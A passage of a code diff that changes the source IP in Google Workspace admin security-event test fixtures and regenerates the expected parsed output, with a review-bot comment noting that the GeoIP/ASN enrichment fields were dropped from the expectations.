-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json
index 5672e20d0dc..02d23d9551d 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351368500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079532100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALLOW_STRONG_AUTHENTICATION", "id": "1", @@ -93,7 +75,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
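Review bot: The regenerated expected document drops `source.geo` and `source.as` entirely instead of carrying the lookup result for the new address, so after this change the file no longer asserts that the pipeline's GeoIP/ASN enrichment runs on `source.ip` at all; the same pattern repeats in the hunks at @@ -119, -204, -287, -370, -452, -536, -618, -701 and -784. If 67.43.156.13 was chosen because it resolves in the bundled test database (which is what "supported subset" suggests), the expected output should contain the corresponding `"geo"` and `"as"` objects rather than omit them; if instead the file was regenerated without that database available, a future regression in the geoip processor would pass this test unnoticed. Worth confirming which of the two happened and regenerating with the test database present, since the PR description only says the IP was changed.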
@@ -119,35 +101,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351375Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079537900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", "id": "1", @@ -178,7 +142,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -204,35 +168,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351377Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079543500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", "id": "1", @@ -263,7 +209,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -287,35 +233,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351378900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079548Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": 
"admin", "action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", "id": "1", @@ -346,7 +274,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -370,35 +298,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351380600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "ingested": "2021-12-09T13:38:53.079553600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "ADD_TO_TRUSTED_OAUTH2_APPS", "id": "1", 
@@ -428,7 +338,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
